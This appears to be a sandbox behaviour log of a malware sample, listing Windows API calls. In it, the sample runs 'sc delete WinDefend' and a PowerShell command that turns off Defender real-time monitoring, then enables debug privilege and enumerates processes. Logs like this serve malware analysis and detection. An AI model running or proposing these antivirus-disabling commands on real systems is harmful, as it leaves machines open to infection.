	[0056.359] UpdateProcThreadAttribute (in: lpAttributeList=0x27ef18, dwFlags=0x0, Attribute=0x60001, lpValue=0x27efd8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x27ef18, lpPreviousValue=0x0) returned 1
	[0056.359] GetStartupInfoW (in: lpStartupInfo=0x27eed4 | out: lpStartupInfo=0x27eed4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0056.359] GetProcessHeap () returned 0x60000
	[0056.359] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x18) returned 0x72fe0
	[0056.359] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0056.359] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0056.360] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0056.361] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0056.361] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0056.361] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0056.361] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0056.361] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0056.361] GetProcessHeap () returned 0x60000
	[0056.361] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x72fe0 | out: hHeap=0x60000) returned 1
	[0056.361] GetProcessHeap () returned 0x60000
	[0056.361] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0xa) returned 0x6d5c0
	[0056.361] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0056.362] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x27ef74*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc  delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x27efc0 | out: lpCommandLine="sc  delete WinDefend", lpProcessInformation=0x27efc0*(hProcess=0x50, hThread=0x4c, dwProcessId=0x8e4, dwThreadId=0x8d0)) returned 1
	[0056.367] CloseHandle (hObject=0x4c) returned 1
	[0056.367] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0056.367] GetProcessHeap () returned 0x60000
	[0056.367] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x71f80 | out: hHeap=0x60000) returned 1
	[0056.367] GetEnvironmentStringsW () returned 0x71f80*
	[0056.367] GetProcessHeap () returned 0x60000
	[0056.367] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x942) returned 0x70250
	[0056.367] FreeEnvironmentStringsW (penv=0x71f80) returned 1
	[0056.367] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0056.691] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x27eeb4 | out: lpExitCode=0x27eeb4*=0x0) returned 1
	[0056.691] CloseHandle (hObject=0x50) returned 1
	[0056.691] _vsnwprintf (in: _Buffer=0x27effc, _BufferCount=0x13, _Format="%08X", _ArgList=0x27eec0 | out: _Buffer="00000000") returned 8
	[0056.691] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0056.692] GetProcessHeap () returned 0x60000
	[0056.692] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x70250 | out: hHeap=0x60000) returned 1
	[0056.692] GetEnvironmentStringsW () returned 0x73158*
	[0056.692] GetProcessHeap () returned 0x60000
	[0056.692] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x968) returned 0x70250
	[0056.692] FreeEnvironmentStringsW (penv=0x73158) returned 1
	[0056.692] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0056.692] GetProcessHeap () returned 0x60000
	[0056.692] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x70250 | out: hHeap=0x60000) returned 1
	[0056.692] GetEnvironmentStringsW () returned 0x73158*
	[0056.692] GetProcessHeap () returned 0x60000
	[0056.692] RtlAllocateHeap (HeapHandle=0x60000, Flags=0x8, Size=0x968) returned 0x70250
	[0056.692] FreeEnvironmentStringsW (penv=0x73158) returned 1
	[0056.692] GetProcessHeap () returned 0x60000
	[0056.692] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x6d5c0 | out: hHeap=0x60000) returned 1
	[0056.692] DeleteProcThreadAttributeList (in: lpAttributeList=0x27ef18 | out: lpAttributeList=0x27ef18) 
	[0056.692] _get_osfhandle (_FileHandle=1) returned 0x7
	[0056.692] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0056.692] _get_osfhandle (_FileHandle=1) returned 0x7
	[0056.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0056.692] _get_osfhandle (_FileHandle=0) returned 0x3
	[0056.692] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0056.692] SetConsoleInputExeNameW () returned 0x1
	[0056.692] GetConsoleOutputCP () returned 0x1b5
	[0056.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0056.693] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0056.693] exit (_Code=0) 

Process:
	id = "19"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7ee17780"
	os_pid = "0x81c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "16"
	os_parent_pid = "0xfc4"
	cmd_line = "powershell  Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 57
	os_tid = 0x114

	[0057.826] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0057.995] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0057.996] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0057.996] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0057.996] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0058.757] GetVersionExW (in: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0058.757] GetLastError () returned 0x2
	[0058.758] GetVersionExW (in: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0058.758] GetLastError () returned 0x2
	[0058.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.764] GetLastError () returned 0x2
	[0058.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0058.772] GetLastError () returned 0x2
	[0058.772] GetVersionExW (in: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x242ae8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0058.772] GetLastError () returned 0x2
	[0058.774] SetErrorMode (uMode=0x1) returned 0x1
	[0058.775] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xaeb98 | out: lpFileInformation=0xaeb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0058.776] GetLastError () returned 0x2
	[0058.776] SetErrorMode (uMode=0x1) returned 0x1
	[0058.778] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xaec1c | out: lpdwHandle=0xaec1c) returned 0x94c
	[0058.780] GetLastError () returned 0x0
	[0058.781] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1e74d8c | out: lpData=0x1e74d8c) returned 1
	[0058.783] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaebe8, puLen=0xaebe4 | out: lplpBuffer=0xaebe8*=0x1e74e28, puLen=0xaebe4) returned 1
	[0058.785] lstrlenW (lpString="䅁") returned 1
	[0058.791] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e74f04, puLen=0xaeb60) returned 1
	[0058.792] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0058.793] lstrcpyW (in: lpString1=0x242ad0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0058.793] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e74f58, puLen=0xaeb60) returned 1
	[0058.793] lstrlenW (lpString="System.Management.Automation") returned 28
	[0058.793] lstrcpyW (in: lpString1=0x242ad0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0058.793] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e74fb4, puLen=0xaeb60) returned 1
	[0058.793] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0058.793] lstrcpyW (in: lpString1=0x242ad0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0058.793] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e74ff4, puLen=0xaeb60) returned 1
	[0058.793] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0058.793] lstrcpyW (in: lpString1=0x242ad0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0058.793] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e7505c, puLen=0xaeb60) returned 1
	[0058.793] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0058.793] lstrcpyW (in: lpString1=0x242ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0058.793] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e750f8, puLen=0xaeb60) returned 1
	[0058.793] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0058.793] lstrcpyW (in: lpString1=0x242ad0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0058.794] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e7515c, puLen=0xaeb60) returned 1
	[0058.794] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0058.794] lstrcpyW (in: lpString1=0x242ad0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0058.794] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e751d8, puLen=0xaeb60) returned 1
	[0058.794] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0058.794] lstrcpyW (in: lpString1=0x242ad0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0058.794] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x1e74e80, puLen=0xaeb60) returned 1
	[0058.794] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0058.794] lstrcpyW (in: lpString1=0x242ad0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0058.794] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x0, puLen=0xaeb60) returned 0
	[0058.794] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x0, puLen=0xaeb60) returned 0
	[0058.794] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xaeb64, puLen=0xaeb60 | out: lplpBuffer=0xaeb64*=0x0, puLen=0xaeb60) returned 0
	[0058.794] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaeb58, puLen=0xaeb54 | out: lplpBuffer=0xaeb58*=0x1e74e28, puLen=0xaeb54) returned 1
	[0058.795] VerLanguageNameW (in: wLang=0x0, szLang=0x242ad0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0058.797] VerQueryValueW (in: pBlock=0x1e74d8c, lpSubBlock="\\", lplpBuffer=0xaeb6c, puLen=0xaeb68 | out: lplpBuffer=0xaeb6c*=0x1e74db4, puLen=0xaeb68) returned 1
	[0058.849] GetCurrentProcessId () returned 0x81c
	[0058.855] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xae3a4 | out: lpLuid=0xae3a4*(LowPart=0x14, HighPart=0)) returned 1
	[0058.857] GetLastError () returned 0x0
	[0058.858] GetCurrentProcess () returned 0xffffffff
	[0058.858] GetLastError () returned 0x0
	[0058.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xae3a0 | out: TokenHandle=0xae3a0*=0x2e4) returned 1
	[0058.859] GetLastError () returned 0x0
	[0058.861] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x1e778cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0058.861] GetLastError () returned 0x0
	[0058.862] CloseHandle (hObject=0x2e4) returned 1
	[0058.862] GetLastError () returned 0x0
	[0058.865] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x2e4
	[0058.865] GetLastError () returned 0x0
	[0058.872] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x1e77910, cb=0x100, lpcbNeeded=0xaeb94 | out: lphModule=0x1e77910, lpcbNeeded=0xaeb94) returned 1
	[0058.873] GetLastError () returned 0x0
	[0058.875] GetModuleInformation (in: hProcess=0x2e4, hModule=0x22280000, lpmodinfo=0x1e77a50, cb=0xc | out: lpmodinfo=0x1e77a50*(lpBaseOfDll=0x22280000, SizeOfImage=0x72000, EntryPoint=0x22287363)) returned 1
	[0058.875] GetLastError () returned 0x0
	[0058.877] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x22280000, lpBaseName=0x20d6a0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0058.877] GetLastError () returned 0x0
	[0058.878] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x22280000, lpFilename=0x20d6a0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0058.878] GetLastError () returned 0x0
	[0058.879] CloseHandle (hObject=0x2e4) returned 1
	[0058.879] GetLastError () returned 0x0
	[0058.879] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x81c) returned 0x2e4
	[0058.879] GetLastError () returned 0x0
	[0058.881] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x1e76f00 | out: lpExitCode=0x1e76f00*=0x103) returned 1
	[0058.881] GetLastError () returned 0x0
	[0058.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e75278, Length=0x20000, ResultLength=0xaebdc | out: SystemInformation=0x2e75278, ResultLength=0xaebdc*=0xb2f8) returned 0x0
	[0058.947] EnumWindows (lpEnumFunc=0x1d23612, lParam=0x0) returned 1
	[0058.949] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.949] GetLastError () returned 0x0
	[0058.949] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.949] GetLastError () returned 0x0
	[0058.949] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.949] GetLastError () returned 0x0
	[0058.949] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.949] GetLastError () returned 0x0
	[0058.949] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.949] GetLastError () returned 0x0
	[0058.949] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8b0
	[0058.949] GetLastError () returned 0x0
	[0058.949] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8f0
	[0058.949] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x450
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x100e0, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.950] GetLastError () returned 0x0
	[0058.950] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x5008c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x73c
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x73c
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xfc8
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x90050, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xef0
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x20280, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xe14
	[0058.951] GetLastError () returned 0x0
	[0058.951] GetWindowThreadProcessId (in: hWnd=0x201a0, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
